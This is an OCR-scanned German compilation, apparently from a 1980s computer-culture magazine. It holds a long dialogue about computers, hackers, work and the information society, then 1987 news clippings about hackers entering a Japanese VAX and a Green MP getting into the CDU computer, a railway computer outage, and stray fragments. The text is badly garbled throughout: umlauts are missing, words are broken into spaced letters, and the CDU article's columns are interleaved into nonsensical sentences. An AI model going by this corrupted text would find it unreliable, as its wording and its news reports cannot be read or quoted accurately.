p: Wieso leider Gottes? Fuball ist auch so eine Sache wie Computer, die alle Menschen aus verschiedenen-oft mnnlichen Geschlechtsideologischen und philosophischen Bereichen verbindet. m: Es geht jetzt um die Synchronisation von Gefhlen. Um Code. Um Sprache. Sozialer Code nenne ich jetzt eine Sprache auf einem anderen. . . p:.. .Das sind ja auch Gegenbilder, Fuball und Computer. Auf der einen Seite hast du ein Massenzeremoniell. Auf der anderen Seite hast du mit dem Computer - ich hab das hier noch unterstrichen durch meine Pharaonen am Schreibtisch, und balinesische Tempeldmonen dann seh ich manchmal einen Tischaltar vor mir stehen. Von der Form her, und von dem her, was ich daran tue. Ich vollziehe mein tgliches Ritual an diesem kleinen Hausaltar. Das ist wiedermal eines von diesen vielen Modellen, die du ber den Computer denken kannst. Da kann ich z.B. auch ein Bild machen, wenn ich sage: Ich kann mich manchmal in der Vorstellung in Merlin, den Magier verwandeln. Auch blo mit einer gewissen kleinen Formvernderung im Design des Instrumentariums. Statt der Kristallkugel steht da der Bildschirm. m: Das ist jetzt alles noch im Bereich der Unterhaltung. p: Nein, da kommen tatschlich verbindliche Informationen raus. Dinge, die ich ber mich selbst und ber die Welt erkennen kann. m: Das find ich jetzt interessant. Was sind "verbindliche Informationen"? p: Ich hab vorhin dieses ganz plumpe Modell mit Information und Unterhaltung gemacht. Und verbindliche Informationen, das sind fr mich die, auf die ich reagiere und zwar mit meinem Gefhl. Als erstes. Das ist sozusagen die erste Anzeige, wenn sich da im Gefhl irgendwas tut, dann wird eine Information interessant. Dann fang ich an, im Kopf nochmal zu berprfen, ob die fr mich verbindlich sein kann oder ist. Dann treffe ich die Entscheidung. Alles andere geht nur durch. Durchlauferhitzer. Das ist Unterhaltung. Vorne rein, hinten raus. Da bleibt natrlich manches hngen, das mischt sich. m: Ja, da bleibt einiges hngen. Es ist halt die Frage, was hngenbleibt. Jetzt nicht negativ gewertet. p: Muster. Muster bleiben hngen. Das ist z.B. was, was du am Computer auch sehr gut lernst:

Muster zu erkennen. Da das eigentlich e i n e wahnsinnig interessante Sache ist. Ganz w e r t frei' Muster und Strukturen siehst du, w o d u vorher noch nichts gesehen hast. Und k a n n s t dadurch bestimmte Dinge wieder besser in die Hand nehmen, besser denken oder machen. m: Ich will jetzt vom Computer wieder w e g kommen. Ich find diese Geschichte, immer w i e der auf den Computer, nicht ganz so wichtig. p: Du bist aber auch selber schuld, du hast m i c h jetzt so angekurbelt. Da fallen mir d a u e r n d irgendwelche Sachen ein. m: Ich will das auch nicht negativ sehen. Ich meine einfach, da es um die Frage geht in unserem Brainstorming, Computer als Modell, als bewutseinserweitemde Geschichte, die hab ich hierauch Psycho-Hacking genannt, die Feuer-Geschichte, andererseits die Geschichte mit der Hand, und dann auch Modelle durchprobieren, die man eigentlich mit M e n schen auch machen "knnte". Und so praktisch die ganze Geschichte des Computers als m e n schliches Testprogramm machen, wieso nicht mit Menschen, wie du auch. . .

p: Weit du, was ich dir sage: Du kannst a . , u einen negativen Aspekt daraus machen 2 c t l du sagst: Wieso nicht mit Menschen? D e r C r C n n puter hat eine Eigenschaft, die man ihm s c h "

gut anrechnen kann: Er ist unendlich tolerant. Du kannst einen Fehler tausendmal hintereinander machen, er wird dich mit unendlichem Gleichmut immer weiter deinen Bldsinn machen lassen, so lange, bis du's vielleicht selber. . . Er macht dich drauf aufmerksam im Extremfall, da du einen Fehler gemacht hast, er gibt dir eine Zustandsmeldung.. . m: Es geht ja nicht um Fehler, um Technik. Es geht um Philosophie. Du kannst grundstzlich jede Situation durchsimulieren. Fast jede. Theoretisch kannst du Auschwitz nachsimulieren. Gibt's ja schon Computergames. p: Das ist nicht, was ich unter Simulation verstehe. m: Das ist reine Simulation. Ich treibe es jetzt ein Stck weiter, ich gehe auf die Grasmuck Theorie zurck: Arbeit als Philosophie ist in der Dekadenz. Arbeit als Identifikation existiert kaum noch, es sei denn, es hat direkt mit Unterhaltung zu tun. Die Leute gehen im Westen doch den Weg des geringsten Widerstandes, d.h., die Werte einer Arbeit werden mit Unterhaltung oder einer Lebensqualitt gleichgesetzt, ob es jetzt Geld ist o d e r . . . p : . . .oder mit Forschung. Ich mu leider schon wieder den Computer erwhnen. Und zwar, wir haben so einen Zustand, in dem du eigentlich meinen knntest: die Welt ist entdeckt. Und es geht nur noch um ein paar unwesentliche Details, z.B. darum, was eine halbe Sekunde vor dem ausgebrochenen Urknall passiert ist, genau am Anfang. Was ab der halben Sekunde danach passiert ist, wissen die theoretischen Physiker schon. Du kannst nicht mehr, so wie im 18. oder 19. Jahrhundert noch das Allgemeinwissen deiner Zeit als ein Mann berblicken. Man wird so verunsichert. Du wirst kleingemacht durch das Gefhl: du kannst als Einzelperson gar nichts mehr entdecken, nichts mehr erforschen. Du brauchst mindestens einen Teilchenbeschleuniger, Grotechnologie, Kernresonanzspektrometer, Computertomographen, diese ganzen teuren, riesigen Dinger. Oder Spezialistenteams, die sich vorher schon 20 Jahre auf der Uni das Hirn ausgerissen haben. So. Und dann kommt pltzlich genau ausdem Sektorso eine kleine Maschine, der Computer, der in einem Jahrzehnt eine Leistungsfhigkeit erreicht, soda du eben, was grade noch in einem Rechenzentrum an Leistung rumstand vordreivier Jahren, pltzlich auf deinem Schreibtisch steht. Und du hast die Mglichkeit, damit zu forschen, zu arbeiten, als Einzelner, als privater Mann.. m: Gut, aber es interessiert niemanden mehr

auer dir selber, diese Forschung. p: Das stimmt berhaupt nicht. Da mu ich bitteschn auf die Hacker hinweisen, als kleines Beispiel. . . m: Du kannst die Hacker als die ewige Reaktionsgeschichte, Kontrollinstanz, nicht immer wieder als Inhalt auffhren. p: Das ist ein Inhalt, der ist akut. Es gibt bestimmte Inhalte, die sind zu bestimmten Zeiten der Geschichte akut, da. Dann verschwinden sie wieder und andere sind dran. m: Die Hacker sind allerhchstens eine Avantgarde und eine reaktive Kontrollinstanz, die inhaltlich an einer Philosophie nicht mitarbeiten, sondern nur, indem sie Grenzbereiche schaffen, wo gewisse Machtwerte infrage gestellt werden, interessant sind. Sie sind Friktion, sie pushen etwas. Sie pushen gewisse Machtkompetenzen, die einerseits fast vollkommen unumschrnkt von gewissen Leuten gemacht werden, ob jetzt Information, Wissenschaft oder andere, und pieksen da mal rein. Und dann perfektioniert sich die Geschichte. Das ist nichts anderes, zurzeit. Es ist keine Vision bei diesen Leuten da, es ist nur Unterhaltung, oder computergamemig Forschung zu machen. Probieren, tfteln, reagieren, Squash spielen, sonst nichts. An dem Punkt sind wir jetzt schon lange angelangt. Und du kannst nicht immer wieder die Maschine.. . und das passiert, und das passiert. Arbeit, sicher, Arbeit ist alles. Aber es gibt "Beschftigung" und "Arbeit", und da ist ein Unterschied. Und das ist Beschftigung, was diese Leute machen. Inhaltlich leben sie vielleicht nach drei,vier Jahren davon, unabsichtlich, als riesige Software-Spezialisten oder Hardware-Spezialisten, engagiert in einem Bereich, wo sie gar nicht wissen, wo sie sind. Wo sie sich nie 'mit identifiziert haben, auer mit einerTechnikgeilheit. Oder eben diesen zwei Grnden. Und was anderes nicht. p: Da triffst du jetzt wiedereinen wunden Punkt. Da bin ich mit meiner Arbeitsrichtung auf einer Insel, weil das tatschlich im Augenblick ein aktuelles Problemteilchen Ist. Weil viele von den Hackern so in ein Alter kommen, wo sie an Existenzgrndung denken... m:. . .denken mssen... p: . . .Ja, und im Augenblick sich die merkwrdigsten Dinge abspielen. Es entstehen Konkurrenzen zwischen Leuten, die vorher traulich im Schulterschlu mit Selbstverstndlichkeit ihren Spa gehabt haben, gearbeitet

haben, geforscht haben, ohne da von Geld auch nur die Rede war. Und pltzlich machen ein paar von ihnen mit einersehr hnlichen Idee zwei Lden auf, Firma. Pltzlich ist da ein gewisser Frost zu bemerken, Kommunikationssperre. Dinge werden vertraulich behandelt. Da schleicht die Paranoia herum. m: Das ist ja wieder: Da wird eine Geschichte, die mal Spa war, zu Geld und dann wird's komisch frdie Leute. Und da gibt es berhaupt keine inhaltliche Diskussion, wofr, fr was, berhaupt nichts. Vorbei. p: Das geht ja. Ich hab ja auch das, was mir Spa macht, zu meinem Beruf gemacht. Ich bin Berufskind - in sorgfltiger Unterscheidung zu dem Begriff Berufsjugendlicher.. m : . . .Berufsjugendlicher, Berufsromantiker... p: Nein, ich bin KEIN Berufsjugendlicher. Ich bin Berufskind. Ich kann es mir endlich erlauben, in Ruhe fertigzuspielen. Es gibt einen schnen Satz von Nietzsche, der hat mal gesagt: Man mu als Mann den Ernst wiederfinden, den man als Kind beim Spielen hatte. Das schreib ich mir ins Wappen - falls ich mir mal eines zulegen sollte. nrr. Ich gehe trotzdem weiter. Seit einer Stunde will ich diesen Satz zuende sagen. p: Du bist immer noch nicht dazu gekommen, die Grasmuck-Theorie auszufhren. Aber ich bin immer noch mit dabei, Mike. m: Ja, gut. Und diese Geschichte von - ich wiederhole es jetzt - da 1/5 der Gesellschaft 4/5 der anderen durchziehen knnte. Was heit das jetzt materiell gesehen? Da in einer Gesellschaft, in der 1/5 arbeitet, ein monetres System... Stell dir vor, 1 /5 der Leute, die alles produziert, zahlt 4/5 der anderen Leute, die nicht arbeiten - ich sage nicht, da sie sich nicht beschftigen - , also, die nicht arbeiten in diesem Sinne, zahlen denen Material, damit sie sich was kaufen knnen, was essen. . . Wie funktioniert das? Wie wird das entschieden? Was ndert sich gesellschaftlich, wenn dieses monetre System, das bisher jahrhundertelang funktioniert hat, nicht mehr existiert? Oder: Es ist doch vollkommen abstrus oder dekadent, wenn 1/5 der Leute, sozialgeldmig nmlich, 4/5 der Leute bezahlt, damit sie ihnen, dem 1/5, was abkaufen, egal ob man da ein Turnussystem oder irgendwas anderes macht. p: Geld ist eine Sache, berdie mach ich mirviel zu wenig Gedanken. Da hast du eh recht. Da

hab' ich nur ein ganz schwaches Verhltnis dazu. Ich bin froh, wenn ich eine Freundin h a b , die meine Kassa verwaltet, so eine kleine Y o k o Ono. m: Es geht jetzt nicht um Geld, sondern w a s sich gesellschaftlich dann ndert. p: Ja, ich mach mir auch in der Folge u m die weiteren Geldstrukturen keine Gedanken. m: Es geht jetzt nicht um die Geldstrukturen, sondern darum, da die Informationsgesellschaft mit sich bringt, da eine gewisse.. . p: Das wird ja auch vereinheitlicht. Das w a r ja eines der ersten Dinge, die digitalisiert w o r d e n sind. Geld fliet doch auch nurnoch in Form von Datenstrmen. ^ ^ ^ ^ ^ ^ ^ umverteilbar_ _ _ p.und die Datenstrme erreichen zwischendurch Realittsgrade bis hin zu dem Brsenkollaps. Das ist ja auch eines von d e n neuen, ganz groen Videospielen. Die internationale Brse. m: Das ist auch ein Videospiel, das sich als Videospiel degradieren wird. Was heit: In Zukunft werden gewisse Informationen mit der gleichen Qualitt, oder mit dem gleichen W e r t , behandelt werden wie Geld. Und das werden irgendwelche wichtigen Informationen sein, von.. . p: Ja, eine Hyper-Abstraktion. Ist ja Geld s c h o n eine Abstraktion von realem Wert. Ob du jetzt ins Spielcasino gehst und einen Jeton kriegst, der eine zweite Abstraktion von Wert ist, o d e r ob du digitales Geld nimmst, oder Bankberweisungen, wo nur noch Ziffern hinundherflutschen, das ist schnurz. Das ist dasselbe. m: Ich meine jetzt, der letzte Imperialismus was ich meinte mit dem Westen. Wir zahlen eine Monopolisierung des Informationswertes Es wird ein Monopol. Nur wird es dann s e h r lustig, weil das Gremium aus einer Demokratie von Werten bestehen wird, die einfach so pervers und so krank und so durcheinander s e i n werden, da es wieder als Ubergangsphase ich schtze so in 20,30 Jahren - eine Mischunq von Grnen bis Linksradikalen bis P o r n o - Leuten bis Politik... - wird alles gemischt s e i n Und da wird ein Cocktail zusammengestellt von Informationen, was was wert ist, und es w i r d deine Einblendung von lnformations-Navig a _ toren - , es werden Leute sehr gut bezahlt werden da sie die richtigen Informationen a n

den richtigen Ort bringen. Und das werden die Leute sein, die gewisse Geschichten kontrollieren werden. p: Dieser Beruf vom Navigator, der ist ja in der Vorstellung auch schon mit einem gewissen Optimismus ausgestattet. Weil, es gibt eine andere Perspektive, wenn du dir die Entwicklungen in den Datenbanken momentan anschaust: Da ist immer die Verheiung, das Wissen der Menschheit steht uns zu Verfgung. Die Realitt ist aber das exakte Gegenteil. D.h. es wird das Wissen der Menschheit vergraben und versteckt, halt nicht mehr in Lchern, Hhlen und Truhen oder lateinischen bersetzungen, sondern in Datenbanken. Du hast eine ganz klare konomische Barriere, d.h. das Monatsabonnement fr eine Datenbank, sagen wir ber die geologische Struktur Unteritaliens, geht im Schnitt bei 100 Mark im Monat los, aufwrts. Das sind alles Fachdatenbanken, hunderte. Etwas ungeregeltere und freie Formen von Informationsaufnahme wie z.B. durch ein Buch schlendern oder durchblttern, schmkern, kreuz&querlesen usw., das fllt schon mal weg. Wieder eine Verrohung der Informationsaufnahme. Und dann gibts noch die Sperre: du kommst an Datenbaken nicht ran, wenn du das Knowhow nicht hast da kme dann wieder der Navigator zum Einsatz - , wenn der berhaupt noch zum Einsatz kommt. Weil: Wenn das so weitergeht, wenn ich jetzt mal ausnahmsweise auch schwarz malen darf, kann es durchaus sein - wenn du nicht mehr WEISST, was es zu wissen gibt, dann kanst du es auch nicht suchen und schon gar nicht finden. D.h., das Prinzip der humansitischen Bildung oder der klassischen Allgemeinbildung. . . m: Da wird es zwei Versionen geben. Entweder man nimmt, was kommt, oder es werden sich

gewisse Leute. . . p : . . .wie Fernsehprogramm. . . m: . . .fernsehprogrammig meinungsmig aufbauen, die sagen: Das und das ist wichtig. Aber ich glaube, da noch ein anderer Punkt wichtig ist, rein von der Gesdellschaftsstruktur her, wenn man jetzt z.B. die BKA-Geschichte anguckt, diese total hilflosen Polizisten, und andererseits die total hilflosen Hacker. Und dann gibt's Leute wie mich, oder andere Leute - ich werd' von diesen Leuten schon ziemlich gut behandelt. Ob es jetzt die Hacker sind, oder die Musikszene, odervon gewissen Leuten aus der Kunstszene, einfach aus dem Grund, da ich jetzt schon in einem gewissen Sinn eine philosophische Navigator-Funktion habe. p: Klar, wir haben doch alle schon an deinem Mythos mitgearbeitet, Mike. Du hast eine Verpflichtung. m: Das ist schon klar, da ich eine Verpflichtung hab'. Ich hab' von Anfang an auch sehr bewu t gesehen, da ich diese Verpflichtung hab' und auch haben will. Jetzt natrlich: die Gefahr ist, da ich irgendwann gedacht hab, ich helfe dabei. Aber ich hab' mich nie damit abfinden knnen und fhl mich sehr schlecht dabei, da jetzt die Leute sich drauf verlassen: Der wird das schon fr uns machen, und selber gar nichts machen. p: Da bist du selber mal mit dem Stellvertreterproblem konfrontiert. m: Absolut. Das steht jetzt nicht zur Diskussion. Was zur Diskussion steht, ist, da du vom gesellschaftlichen Status, wenn ich den Grasmuck nehme, wie er im Institut fr Mathematik

und Datenforschung z.B. eine Aufgabe gehabt hat, das war vor sieben Jahren: er mute das ganze Institut-das sind schtzungsweise 1200 Leute, Angestellte, ist staatlich, ist Forschungsabteilung hoch hundert, Nhe Bonn, so 20 km von Bonn - , er war dafr verantwortlich, alles auf den neuesten Stand der Informationstechnik umzustellen und gleichzeitig - stell dir das mal vor: eine Person ist dazu da, die Orientierung der neuen Forschungsprogramme zu bestimmen. Dieser Mensch hatte in seiner Arbeit die Funktion und die Ttigkeit bestimmt. Kannste dir vorstellen, wie die ausgeflippt sind. . . p : . . .der Muezzin, der Vordenker. m: Viel, viel einfacher. Viel diskreter. Er durfte - wieder auf einer ganz anderen Ebene, nmlich wo die Lsungen wieder falsch gesucht werden - als Betriebspsychiater, durfte er hingehen, beim Direktor - hatte einen Status ber dem Direktor - in Bcherhallen gucken, ins Programm reingucken, bis hin zur Besenkammer, er durfte berall hin und stand abstrakt gesehen ber allen. Ein Psychiater ist das auch. Und immer mehr Leute verlassen sich auf solche Leute und behandeln die Leute auch als. p: Als ich in Fabriken gearbeitet hab', das waren immer die Leute, die mit der Stoppuhr neben dem Scheihaus gestanden sind, oder neben dem Kaffeeautomaten. Die Rationalisierungsfachleute. m: Ja, aberdas ist jetzteine andere Geschichte. Das ist ja nicht eine negative oder eine Push Geschichte, sondern eine konstruktive Geschichte. Positiv gesehen. p: Mcke wei selber, da er Arbeitspltze wegrationalisiert. m: Der Mcke wei das. Aber der Mcke wei z.B. auch, da d i e . . . das war auch eine lange Diskussion: da eine Gesellschaft ohne Arbeit, und das ist seine These, theoretisch vor dem Problem steht, neue Inhalte zu schaffen. p: Richtig. Den Arbeits-Begriff neu zu bestimmen. m: Jetzt ist z.B. die erste Geschichte: Verkrzung der Arbeitszeit hat nicht mehr Freiheit geschaffen fr die Leute, sondern eher neue Probleme. p: Du kannst z.B. neue Berufe erfinden.

m: Das ist auch meine Neigung. p- Nicht nur in der Mikroelektronik oder i n der Computer-Umgebung. Es ist die Zeit, du kannst dir heutzutage, eigentlich viel l e i c h t e r und zwar grade weil es schwerer g e w o r d e n ist auf dem konventionellen Sektor - neue B e r u f e erfinden. nv Ja aber ohne da es auf dem Daniel Ds e n t r i e b - T r i p landet, verstehste. Da z.B. nicht die Europer mit der neuen Informationsgesellschaft diesen neuen Donald Duck-Tick kriegen und sagen: Es ist eh nix wichtig, es ist geil und es bringt Kohle und einen Komplex kriegen, einen brgerlichen Komplex.. p: Das ist Mickymaus, bitteschn. Micky ist der Spieer. m: Ja, aber die ganzen Micky-Berufe, die jetzt erfunden werden, wo die Leute nicht stolz drauf s e i n werden, die dann zurckknallen: Ich m c h t jetzt Schuhmacher werden, oder ich m c h t Steinmetz werden. Das wird nmlich k o m m e n . Die groe Petra in Berlin, ja, hat zehn J a h r e Szene gemacht, und Drogen und alles, u n d ist jetzt schon 37, und jetzt will sie in Bayern in eine Steinmetzlehre gehen. p: Ach, das ist wie bei einem Freund von mir. Der hat sich ein halbes Jahr lang, weil er mit einer Maus aus einer Werbeagentur z u s a m men war, die 5000 Mark im Monat verdient hat mir ihr zusammen jeden Tag einen Viertelmeter Koks reingesaugt, kriegt nach einem halben Jahr einen Nachmittag lang eine halbseitige Lhmung und trinkt dann zwei Wochen lang nur Krutertee. Das ist so das Prinzip. m: Ja, aber jetzt geht es darum, da z.B. d a berhaupt keine Bestndigkeit, keine Vision und kein Stolz drin ist. Es mu, entweder v o n der Tradition her, dieser Fake "Traditionsgedanke", wo die inhaltlichen Gedanken flutschen gehen, weil das ganze nur noch eine Design-Geschichte ist-die Family ist Design, die ganzen 70er-Modegeschichten sind alles nur Designgeschichten, wo alle Inhalte, Motivationen oder Ursachen flten gegangen sind.. p- ich mu mal mit dir ber meinen Roman reden. Weilda ist einiges von dem drin, worber wir im Augenblick reden. Auf der einen Seite das Monumentale und Mythische. Also so eine Gre. Eine Vison. Da du was Groes willst rrv Neinneinnein. Monumental und visionr, la mich das mal ausformulieren. Gesellschaft ohne Arbeit Es geht um das Bewutsein, da das Monumentale, Mythische natrlich ein Problem

ist in einer bewu ten Gesellschaft. Das Dogma oder das Mysterium, was in jeder Religion ist, ist bis jetzt nicht aufgeklrt worden. Es ist nie voll aufgedeckt worden, wie einfach im Grunde genommen die Geschichte ist. Das sind Tendenzen im Zen-Buddhismus gewesen, das Nichts oder weigottwas... im anderen Extrem jetzt Tendenzen da waren, die Einfachheit solcher Geschichten zu demonstrieren, aus der, sagenwirmal: eine Harmonie des Lebens besteht. Diese Geschichte ist verkleidet in Dogmen, in Gesetze gewesen, in gewisse Fixrituale, die in den Religionen stattgefunden hat, aber obwohl es natrlich vielen Leuten bewut ist, da in allen Religionen eigentlich der gleiche Kern drin ist. Und diese Geschichte ist jetzt in der unbewu ten Phase des Verfhrtwerdens oder des GEfhrtwerdens in einem Ritual natrlich vorbei, von der Technik. Und dieses GEfhrt oder VERfhrt, bis hin zu einem berleben der Mystik in der Sexualitt in den letzten 20 Jahren, wo der Begriff des Echten Verknalltseins ja auch formuliert ist. To fall into love, z.B. Man sagt ja nicht: I go into love. Fall into love. Das ist jaunglaublich, da mirdas passiert ist. Die ganzen Spezialisationen. p: Darber haben wir uns ja auch schon mal unterhalten. Das ist eine wichtige Erfahrung, die wir schon gemacht haben. Da es den Unterschied gibt zwischen dem, was du beschreibst: die romantische Liebe, die ber einen kommt als Naturgewalt. Auf der anderen Seite die Erkenntnis, da Liebe kein Gefhl ist, sondern eine Fhigkeit. m: Gut, richtig. Und da diese Fhigkeit auch konstruiert und aufgebaut werden kann und nicht einfach eine Geschichte ist, die einem passiert wie: Ich bin von meiner Mutter berrascht worden beim Wixen, und durch die Sensation beim Uberraschtwerden, des schlechten Gewissens, meingottwas, hab ich gezittert. Also die Verschmelzung in eine Ekstatik von Krper und Geist. Dieses Jetzt-Moment, das man ja kennt, von der Musik, von einer Schlgerei, auch Hack-Sessions. Dieses Fieber, wo der Zeitbegriff von Zukunft - Vergangenheit einfach aufgelst wird, und der Moment verlngert wird. Und das ist im Grunde genommen ein bewutes Ritual. p: So hat Einstein mal die Relativittstheorie beschrieben. Wie sich die Zeit unterschiedlich wahrnehmen lt, wenn du eine Minute auf dem Scho eines hbschen Mdchen sitzt, und wenn du eine Minute auf einer heien Herdplatte sitzt. m: Und das ist z.B. diese Geschichte, wo ein

vollkommen neues Bewutsein erzeugt werden mu, wo man sagt: Ich verfhre mich jetzt sofort freiwillig, jetzt, bewut, sofort. Oder: Freut euch, sofort, freiwillig. p: Aber das ist ehereine bedenkliche Richtung. Das ist so der Bildschirm als Spiegel des Narzi, wo du eintauchst. m: Das ist geschdigt. Der ganze Symbolismus dieser Geschichten ist nur schdigend. Und da gibts einfach ein paar Negativbeispiele von Hare Krishnabis Sekten, die sagen: Freut euch sofort freiwillig, und dann krieg ich sofort einen schlechten Geschmack. Stimmt. Aber das System ist richtig. Es geht darum, bewut In Sachen reinzugehen, in Zukunft, in Rituale, wo ich nicht sage: Das htt' ich nicht gedacht, pohl, ist mir das passiert, pohl, jeder Tag, es mu mir was passieren! Die Leute sind total gegen die Unsicherheit eines geregelten Tagesablaufs, sind aber von der Unterhaltung und von der Erlebnisqualitt nurdarauf aus, mit Erlebnissen konfrontiert zu werden, die sie aufwhlen und die sie berhaupt nicht kontrollieren knnen, und die ihnen passieren. p: Bei uns hat sich wirklich das lineare Modell, das die Schriftkultur gebracht hat, so eingeprgt, an dieser Linie, an dieser endlosen Zeile geschriebenen, gesprochenen, gedachten, gelesenen Zeile entlangfahren kannst wie an einer Autobusoberleitung, und gar nicht mehr in der Lage bist, oder ein Unsicherheitsgefhl kriegst, da du sozusagen deinen Sicherheitsgurt auflst, wenn du da rausgehst in einen nichtsprachlichen Bereich. Um aus dem Zeitgefhl rauszugehen, mut du aus der Sprache rausgehen. m: Und setzt sich dann lieber vor eine Maschine und macht ein Game, statt mit Leuten sich hinzustellen und zu sagen:. . . p: Da kannst du aber dein Zeitgefhl auch verndern. Worber wir jetzt eh schon ein bichen geredet haben: Versuche, auf so Gleichzeitigkeiten zu kommen. m: Und da sind wir wieder beim Code. Das meinte ich jetzt. Da z.B. dersoziale Code darin besteht, nmlich in Zukunft, in einer Gesellschaft, in der keiner mehr Arbeit hat, aber eine Beschftigung hat, inhaltliche Geschichten zu schaffen, die gewisse Regeln unter den Leuten frdern, die aber bewut sind. Wo jeder wei: Ich verfhre mich jetzt sofort freiwillig, zu dritt.

Jetzt. Zack.

D i e n s t a g , 24. F e b r u a r 1987

Hacket^ schdigten Japan


Zum e r s t e n M a l g e l a n g es a u s l n d i s c h e n C o m p u t e r - H a c k e r s , i n e i n e n m i t geheimen Fakten versehenen japanischen C o m p u t e r e i n z u d r i n g e n . D i e aus Westd e u t s c h l a n d s t a m m e n d e n H a c k e r s knackten e i n e n V a x 11.750, d e r z u m I n s t i t u t f r Hochenergiephysik von Tsukuba gehrt. D i e I n v a s i o n b e g a n n i m M a i 1985 u n d dauerte etwa einen M o n a t . A n f a n g s konnten d i e H a c k e r s d e n C o m p u t e r n u r k u r z e Zeit a n z a p f e n , mit der Z e i t b l i e b e n sie a b e r s o g a r w h r e n d S t u n d e n m i t i h m verb u n d e n . D i e S a c h e flog a u f , als e i n W i s senschafter des Instituts b e m e r k t e , dass m i t t e n i n d e r N a c h t v e r d c h t i g v i e l e Benutzer an den C o m p u t e r angeschlossen w a r e n . Bei d e r U n t e r s u c h u n g f a n d m a n , d a s s d i e H a c k e r s e i n e n I d e n t i t t s c o d e benutzten, der von den japanischen Wissenschaftern k a u m je a n g e w e n d e t w u r d e . Deutsche Ausdrcke im Gesprch mit dem Computer fhrten die Japaner schliesslich auf einen Computer-Terminal, d e r z u r Technischen Universitt v o n West-Berlin gehrt. Die Japaner vermuten a b e r , d a s s m i n d e s t e n s 20 H a c k e r s verschiedener deutscher Universitten wie F r a n k f u r t , M n c h e n u n d H a m b u r g zeitweise ihren C o m p u t e r benutzten. A u c h Forscher v o m Cern in G e n f knnten den Japanern zufolge unter den Eindringling e n g e w e s e n s e i n . G e n a u l s s t sich d i e s jedoch nicht eruieren. Die N a m e n der Hackers sind jedenfalls nicht bekannt. A l s d i e J a p a n e r sie f r a g t e n , w e r sie s e i e n , antwortete einer mit D o n a l d D u c k , ein a n d e r e r m i t S u p e r m a n . ( N e w Scientist; 12. F e b r u a r , S. 25.) (TA)

Lange Warteschlangen an den Bundesbahn-Fahrkartenschaltern: I n F r a n k f u r t und im Rhein-Main-Gebiet war a m Mittwoch keine Platzreservierung z u bekommen; der Fahrkartenverkauf war ebenfalls behindert, und verschiedene Frachtkunden muten nach Auskunft der Bundesbahn bis zu 24 Stunden Versptung in Kauf nehmen. Der Zentralcomputer in Frankfurt war ausgefallen. Am Montagabend hatte das Datenfernbertragungsnetz der Bundesbahn z u m ersten Mal seit 1982 gestreikt. Tickets muten zum Teil per Hand ausgestellt werden. Acht Fachleute arbeiteten von Dienstagabend bis Donnerstagmorgen ohne Pause, um den im Programm versteckten Fehler aufzuspren und zu beheben. A m Mittwochabend gegen 21 Uhr funktionierten die Frankfurter Computer-Terminals wieder, ab Donnerstagmorgen lief der Betrieb im ganzen Bundesgebiet w i e gewohnt. j T r kub

Computer-Strung bei der Bahn sorgte fr Schlangen

Thema Datenschutz: Computer-Freaks haben den Rechner der TU Berlin geknackt oder sich dort jedenfalls Zugnge verschafft. Wre das bei Ihnen und bei Ihrem System mglich - denkbar? Boeden:
Hacker kommen hier

n i c h t rein. W i r haben sicherheitstechnische u n d personelle Sicherheitssysteme entwickelt, die das u n m g l i c h machen, u n d es wird auch stndig daran gearbeitet, die alle n o c h zu verbessern.

* Demnchst in New York: Ein Restaurant mit Video im Tisch: Der Bildschirm zeigt die stets aktuelle Speisekarte und auf Wunsch auch Videospiele. Bestellt und gespielt wird mit dem Joystick; ein ComputerDrucker am Ausgang liefert die Rechnung - und besttigt den High Score, also den erzielten Punktestand bei den Spielen.

s
-c ex:

Der nchtliche Daten-Einbruch


Von Almut Hauenschild
Hacker-Premiere im Deutschen Bundestag. Der Grne Abgeordnete Jo Mller knackte den CDU-Computer. Versehentlich", wie der Bremer Alternative versichert. Es war die Nacht vor Silvester und u m die Geisterstunde. Im Bonner Abgeordneten-Hochhaus Tulpenfeld" leuchtete im linken Flgel der vierten Etage ein einsames Fenster. J o Mller bastelte an einer Wahlrede und durchforstete den fraktionseigenen Computer nach brauchbaren grnen Thesen. Aber was da pltzlich auf dem Bildschirm erschien, kannte er aus keinem Beschlu grner Parteitage. Doch ganz so fremd war es fr ihn auch wieder nicht. Das klang doch wie aus Geilers Mund. Er probierte mit allerlei Codeworten den Adressaten zu ermitteln. Ich sag jetzt nur mal so zum Beispiel, mit dem Code Helm u t oder Hannelore", erzhlt Mller, denn den richtigen Code kann ich ja aus Datenschutzgrnden nicht weitersagen." Und da htte ihm der Rechner ganz brav habt, wo doch jeder wei, da die deutverraten, da er einer derer von Wang ist schen Hersteller preiswertere u n d bessere und in der Parteizentrale der Christunion Systeme anbieten..." stehe. Die EDV-Experten in der C D U wollen Gleich am nchsten Tag schrieb Ml- nicht so recht a n den nchtlichen' Datenler seinem nchtlichen Gesprchspartner: Einbruch glauben. Parteisprecher J r g e n Dein Datensicherungssystem arbeitet Merschmeier erklrte, da der G r n e Abebenso zuverlssig wie die Sicherheitssy- geordnete mglicherweise alles gemacht, steme von Atomkraftwerken: ab und zu sich aber nicht im Computersystem d e r entweicht e t w a s . . . Da jedoch auch das CDU-Zentrale befunden hat". Da J o M l von deinen biologischen Endgerten ( = ler aber nachts u m ein Uhr noch a r b e i t e Programmierern) noch zustzlich instal- verdient ein Fleikrtchen, w a h l w e i s e lierte Pawortsystem dich schutzlos lt, von Jutta Ditfurth oder von Otto S c h i l y hat uns enttuscht. Noch strker entr- Sollte der Abgeordnete Mller sich l & n g ^ l stet waren wir allerdings ber den Inhalt re Zeit i n unserem Computersystem a , ^ . einiger Textdateien. Angesichts der diffa- gehalten haben, knnten wir i h m d a z u mierenden Qualitt dieser Texte solltest n u r gratulieren, weil er politische B i l d u n g du dich deiner Mitarbeit in dieser unseri- genieen konnte. I m brigen gehen -wir aber bis zum Beweis des Gegenteils davon sen Organisation schmen." aus, da es sich bei den B e h a u p t u n g e n Und die Parteien-Oberen im Konradweder u m Hardware noch Software, sonAdenauer-Haus lie Mller wissen: Es ist dern u m eine zu frh gestartete Silvesterbeschmend, da ihr euch so leichtfertig Ente handelt." ein amerikanisches System angeschafft

...

und sonst in Bonn

fvtu:

mfvtevc-m

"9
Following below are the terms, after organizing and alphabetizing the raw data.

OFFENSIVE LANGUAGE VIA COMPUTER Reinhold Aman

